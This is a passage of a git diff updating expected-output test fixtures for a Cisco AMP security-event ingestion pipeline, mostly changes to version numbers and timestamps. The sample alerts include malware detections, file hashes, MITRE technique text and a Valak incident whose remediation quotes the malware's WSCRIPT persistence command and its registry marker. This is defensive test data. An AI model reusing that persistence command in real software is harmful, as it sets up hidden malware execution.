PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.\",\"short_description\":\"W32.WinWord.Powershell\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7\"}}}}}", "kind": "alert", "start": "2020-12-25T05:30:41.000Z", @@ -3548,7 +3548,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -3568,7 +3568,7 @@ }, "event": { "severity": 1, - "ingested": "2021-09-12T17:32:35.701418Z", + "ingested": "2021-09-13T18:06:29.783811789Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":15193384389977,\"timestamp\":1608872547,\"timestamp_nanoseconds\":0,\"date\":\"2020-12-25T05:02:27+00:00\",\"event_type\":\"Vulnerable Application Detected\",\"event_type_id\":1107296279,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1608872547,\"start_date\":\"2020-12-25T05:02:27+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"mshtml.dll\",\"identity\":{\"sha256\":\"d1bea74ac9d85b3dcd4abc1af42af6c37b9349defc8e6577993611b773f56ca0\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8\"}}},\"vulnerabilities\":[{\"name\":\"Microsoft Internet Explorer\",\"version\":\"11\",\"cve\":\"CVE-2018-0762\",\"score\":\"7.6\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762\"},{\"cve\":\"CVE-2018-0772\",\"score\":\"7.6\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772\"}]}}", "kind": "alert", "start": "2020-12-25T05:02:27.000Z", @@ -3647,7 +3647,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -3667,7 +3667,7 @@ }, "event": { "severity": 1, - "ingested": "2021-09-12T17:32:35.701419883Z", + "ingested": "2021-09-13T18:06:29.783813851Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":15193384371995,\"timestamp\":1608872546,\"timestamp_nanoseconds\":0,\"date\":\"2020-12-25T05:02:26+00:00\",\"event_type\":\"Vulnerable Application Detected\",\"event_type_id\":1107296279,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1608872546,\"start_date\":\"2020-12-25T05:02:26+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"mshtml.dll\",\"identity\":{\"sha256\":\"1dc5d15a26a79bb46519952a60b15aa4acb36f6ce3247ebf50df9c157bc4fcf4\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8\"}}},\"vulnerabilities\":[{\"name\":\"Microsoft Internet Explorer\",\"version\":\"11\",\"cve\":\"CVE-2018-0762\",\"score\":\"7.6\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762\"},{\"cve\":\"CVE-2018-0772\",\"score\":\"7.6\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772\"}]}}", "kind": "alert", "start": "2020-12-25T05:02:26.000Z", @@ -3746,7 +3746,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -3766,7 +3766,7 @@ }, "event": { "severity": 1, - "ingested": "2021-09-12T17:32:35.701421764Z", + "ingested": "2021-09-13T18:06:29.783815980Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":15193366641599,\"timestamp\":1608870773,\"timestamp_nanoseconds\":0,\"date\":\"2020-12-25T04:32:53+00:00\",\"event_type\":\"Vulnerable Application Detected\",\"event_type_id\":1107296279,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1608870773,\"start_date\":\"2020-12-25T04:32:53+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"OUTLOOK.EXE\",\"identity\":{\"sha256\":\"465f398ae8e3c32395eb7c04bc8cd24595068e6a127e243bed3e9b4931556bfc\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"71854d2c40664493e05c0a7e4f0c7cc74ada1a63eec1d4fe32350f6af8728243\"}}},\"vulnerabilities\":[{\"name\":\"Microsoft Office\",\"version\":\"2016\",\"cve\":\"CVE-2017-0106\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0106\"},{\"cve\":\"CVE-2017-11774\",\"score\":\"6.8\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11774\"},{\"cve\":\"CVE-2017-8506\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8506\"},{\"cve\":\"CVE-2017-8507\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8507\"},{\"cve\":\"CVE-2017-8571\",\"score\":\"6.8\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8571\"},{\"cve\":\"CVE-2017-8663\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8663\"},{\"cve\":\"CVE-2018-0791\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0791\"}]}}", "kind": "alert", "start": "2020-12-25T04:32:53.000Z", @@ -3864,7 +3864,7 @@ { "@timestamp": "2020-12-25T04:22:45.000Z", "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -3882,7 +3882,7 @@ "event": { "severity": 0, "action": "Policy Update", - "ingested": "2021-09-12T17:32:35.701423630Z", + "ingested": "2021-09-13T18:06:29.783818038Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525498672153625000,\"timestamp\":1608870165,\"timestamp_nanoseconds\":878000000,\"date\":\"2020-12-25T04:22:45+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", "id": "6525498672153625000", "kind": "alert" @@ -3919,7 +3919,7 @@ { "@timestamp": "2020-12-25T04:07:21.000Z", "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -3937,7 +3937,7 @@ "event": { "severity": 0, "action": "Scan Completed, No Detections", - "ingested": "2021-09-12T17:32:35.701425510Z", + "ingested": "2021-09-13T18:06:29.783820119Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525494703603843000,\"timestamp\":1608869241,\"timestamp_nanoseconds\":928000000,\"date\":\"2020-12-25T04:07:21+00:00\",\"event_type\":\"Scan Completed, No Detections\",\"event_type_id\":554696715,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"scan\":{\"description\":\"Flash Scan\",\"clean\":true,\"scanned_files\":2872,\"scanned_processes\":49,\"scanned_paths\":0,\"malicious_detections\":0}}}", "id": "6525494703603843000", "kind": "alert" @@ -3982,7 +3982,7 @@ { "@timestamp": "2020-12-25T04:06:40.000Z", "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -4000,7 +4000,7 @@ "event": { "severity": 0, "action": "Scan Started", - "ingested": "2021-09-12T17:32:35.701427375Z", + "ingested": "2021-09-13T18:06:29.783822173Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525494527510184000,\"timestamp\":1608869200,\"timestamp_nanoseconds\":537000000,\"date\":\"2020-12-25T04:06:40+00:00\",\"event_type\":\"Scan Started\",\"event_type_id\":554696714,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"scan\":{\"description\":\"Flash Scan\"}}}", "id": "6525494527510184000", "kind": "alert" diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp2.ndjson.log b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp2.log similarity index 100% rename from packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp2.ndjson.log rename to packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp2.log diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp2.ndjson.log-expected.json b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp2.log-expected.json similarity index 98% rename from packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp2.ndjson.log-expected.json rename to packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp2.log-expected.json index a4bddd0ecca..76d410f5e5b 100644 --- a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp2.ndjson.log-expected.json +++ b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp2.log-expected.json @@ -3,7 +3,7 @@ { "@timestamp": "2021-01-15T11:59:52.000Z", "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -21,7 +21,7 @@ "event": { "severity": 4, "action": "SecureX Threat Hunting Incident", - "ingested": "2021-09-12T17:31:04.469612451Z", + "ingested": "2021-09-13T18:06:41.546081683Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"timestamp\":1610711992,\"timestamp_nanoseconds\":155518026,\"date\":\"2021-01-15T11:59:52+00:00\",\"event_type\":\"SecureX Threat Hunting Incident\",\"event_type_id\":1107296344,\"connector_guid\":\"test_connector_guid\",\"severity\":\"Critical\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Threat_Hunting\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"87:c2:d9:a2:8c:74\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"threat_hunting\":{\"incident_report_guid\":\"6e5292d5-248c-49dc-839d-201bcba64562\",\"incident_hunt_guid\":\"4bdbaf20-020f-4bb5-9da9-585da0e07817\",\"incident_title\":\"Valak Variant\",\"incident_summary\":\"The host Demo_Threat_Hunting is compromised by a Valak malware variant. Valak is a multi-stage malware attack that uses screen capture, reconnaissance, geolocation, and fileless execution techniques to infiltrate and exfiltrate sensitive information. Based on the event details listed and the techniques used, we recommend the host in question be investigated further.\",\"incident_remediation\":\"We recommend the following:\\r\\n\\r\\n- Isolation of the affected hosts from the network\\r\\n- Perform forensic investigation\\r\\n - Review all activity performed by the user\\r\\n - Upload any suspicious files to ThreatGrid for analysis\\r\\n - Search the registry for data \\\"var config = ( COMMAND_C2\\\" and remove the key\\r\\n - Review scheduled tasks and cancel any involving the execution of WSCRIPT.EXE //E:jscript C:\\\\Users\\\\Public\\\\PowerManagerSpm.jar:LocalZone lqjsxokgowhbxjaetyrifnbigtcxmuj eimljujnv\\r\\n - Remove the Alternate Data Stream file located C:\\\\Users\\\\Public\\\\PowerManagerSpm.jar:LocalZone.\\r\\n- If possible, reimage the affected system to prevent potential unknown persistence methods.\",\"incident_id\":416,\"tactics\":[{\"name\":\"Defense Evasion\",\"description\":\"\u003cp\u003eThe adversary is trying to avoid being detected.\u003c/p\u003e\\n\\n\u003cp\u003eDefense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses.\u003c/p\u003e\\n\",\"external_id\":\"TA0005\",\"mitre_name\":\"tactic\",\"mitre_url\":\"https://attack.mitre.org/tactics/TA0005\"}],\"techniques\":[{\"name\":\"Data from Local System\",\"description\":\"\u003cp\u003eAdversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may do this using a \u003ca href=\\\"https://attack.mitre.org/techniques/T1059\\\"\u003eCommand and Scripting Interpreter\u003c/a\u003e, such as \u003ca href=\\\"https://attack.mitre.org/software/S0106\\\"\u003ecmd\u003c/a\u003e, which has functionality to interact with the file system to gather information. Some adversaries may also use \u003ca href=\\\"https://attack.mitre.org/techniques/T1119\\\"\u003eAutomated Collection\u003c/a\u003e on the local system.\u003c/p\u003e\\n\",\"external_id\":\"T1005\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1005\",\"tactics_names\":\"Collection\",\"platforms\":\"Linux, macOS, Windows\",\"system_requirements\":\"Privileges to access certain files and directories\",\"permissions\":\"\",\"data_sources\":\"File monitoring, Process monitoring, Process command-line parameters\"},{\"name\":\"Scheduled Task/Job\",\"description\":\"\u003cp\u003eAdversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).\u003c/p\u003e\\n\",\"external_id\":\"T1053\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1053\",\"tactics_names\":\"Execution, Persistence, Privilege Escalation\",\"platforms\":\"Windows, Linux, macOS\",\"system_requirements\":null,\"permissions\":\"Administrator, SYSTEM, User\",\"data_sources\":\"File monitoring, Process monitoring, Process command-line parameters, Windows event logs\"},{\"name\":\"Scripting\",\"description\":\"\u003cp\u003e\u003cstrong\u003eThis technique has been deprecated. Please use \u003ca href=\\\"https://attack.mitre.org/techniques/T1059\\\"\u003eCommand and Scripting Interpreter\u003c/a\u003e where appropriate.\u003c/strong\u003e\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and \u003ca href=\\\"https://attack.mitre.org/techniques/T1086\\\"\u003ePowerShell\u003c/a\u003e but could also be in the form of command-line batch scripts.\u003c/p\u003e\\n\\n\u003cp\u003eScripts can be embedded inside Office documents as macros that can be set to execute when files used in \u003ca href=\\\"https://attack.mitre.org/techniques/T1193\\\"\u003eSpearphishing Attachment\u003c/a\u003e and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through \u003ca href=\\\"https://attack.mitre.org/techniques/T1203\\\"\u003eExploitation for Client Execution\u003c/a\u003e, where adversaries will rely on macros being allowed or that the user will accept to activate them.\u003c/p\u003e\\n\\n\u003cp\u003eMany popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)\u003c/p\u003e\\n\",\"external_id\":\"T1064\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1064\",\"tactics_names\":\"Defense Evasion, Execution\",\"platforms\":\"Linux, macOS, Windows\",\"system_requirements\":null,\"permissions\":\"User\",\"data_sources\":\"Process monitoring, File monitoring, Process command-line parameters\"}],\"severity\":\"critical\",\"incident_start_time\":1610707688,\"incident_end_time\":1592478770},\"tactics\":[{\"name\":\"Defense Evasion\",\"description\":\"\u003cp\u003eThe adversary is trying to avoid being detected.\u003c/p\u003e\\n\\n\u003cp\u003eDefense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses.\u003c/p\u003e\\n\",\"external_id\":\"TA0005\",\"mitre_name\":\"tactic\",\"mitre_url\":\"https://attack.mitre.org/tactics/TA0005\"}],\"techniques\":[{\"name\":\"Data from Local System\",\"description\":\"\u003cp\u003eAdversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may do this using a \u003ca href=\\\"https://attack.mitre.org/techniques/T1059\\\"\u003eCommand and Scripting Interpreter\u003c/a\u003e, such as \u003ca href=\\\"https://attack.mitre.org/software/S0106\\\"\u003ecmd\u003c/a\u003e, which has functionality to interact with the file system to gather information. Some adversaries may also use \u003ca href=\\\"https://attack.mitre.org/techniques/T1119\\\"\u003eAutomated Collection\u003c/a\u003e on the local system.\u003c/p\u003e\\n\",\"external_id\":\"T1005\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1005\",\"tactics_names\":\"Collection\",\"platforms\":\"Linux, macOS, Windows\",\"system_requirements\":\"Privileges to access certain files and directories\",\"permissions\":\"\",\"data_sources\":\"File monitoring, Process monitoring, Process command-line parameters\"},{\"name\":\"Scheduled Task/Job\",\"description\":\"\u003cp\u003eAdversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).\u003c/p\u003e\\n\",\"external_id\":\"T1053\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1053\",\"tactics_names\":\"Execution, Persistence, Privilege Escalation\",\"platforms\":\"Windows, Linux, macOS\",\"system_requirements\":null,\"permissions\":\"Administrator, SYSTEM, User\",\"data_sources\":\"File monitoring, Process monitoring, Process command-line parameters, Windows event logs\"},{\"name\":\"Scripting\",\"description\":\"\u003cp\u003e\u003cstrong\u003eThis technique has been deprecated. Please use \u003ca href=\\\"https://attack.mitre.org/techniques/T1059\\\"\u003eCommand and Scripting Interpreter\u003c/a\u003e where appropriate.\u003c/strong\u003e\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and \u003ca href=\\\"https://attack.mitre.org/techniques/T1086\\\"\u003ePowerShell\u003c/a\u003e but could also be in the form of command-line batch scripts.\u003c/p\u003e\\n\\n\u003cp\u003eScripts can be embedded inside Office documents as macros that can be set to execute when files used in \u003ca href=\\\"https://attack.mitre.org/techniques/T1193\\\"\u003eSpearphishing Attachment\u003c/a\u003e and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through \u003ca href=\\\"https://attack.mitre.org/techniques/T1203\\\"\u003eExploitation for Client Execution\u003c/a\u003e, where adversaries will rely on macros being allowed or that the user will accept to activate them.\u003c/p\u003e\\n\\n\u003cp\u003eMany popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit (Citation: Metasploit_Ref), Veil (Citation: Veil_Ref), and PowerSploit (Citation: Powersploit) are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell. (Citation: Alperovitch 2014)\u003c/p\u003e\\n\",\"external_id\":\"T1064\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1064\",\"tactics_names\":\"Defense Evasion, Execution\",\"platforms\":\"Linux, macOS, Windows\",\"system_requirements\":null,\"permissions\":\"User\",\"data_sources\":\"Process monitoring, File monitoring, Process command-line parameters\"}]}}", "kind": "alert" }, @@ -173,7 +173,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -205,7 +205,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:04.469616802Z", + "ingested": "2021-09-13T18:06:41.546087563Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180352115244794000,\"timestamp\":1610709638,\"timestamp_nanoseconds\":279000000,\"date\":\"2021-01-15T11:20:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.GenericKD:ZVETJ.18gs.1201\",\"detection_id\":\"6180352115244793858\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"wsymqyv90.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Local\\\\Temp\\\\OUTLOOK_TEMP\\\\wsymqyv90.exe\",\"identity\":{\"sha256\":\"b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40\",\"sha1\":\"70aef829bec17195e6c8ec0e6cba0ed39f97ba48\",\"md5\":\"e2f5dcd966e26d54329e8d79c7201652\"},\"parent\":{\"process_id\":4040,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", "kind": "alert", "action": "Threat Detected", @@ -275,7 +275,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -307,7 +307,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:04.469618886Z", + "ingested": "2021-09-13T18:06:41.546089852Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180351977805840000,\"timestamp\":1610709606,\"timestamp_nanoseconds\":548000000,\"date\":\"2021-01-15T11:20:06+00:00\",\"event_type\":\"Threat 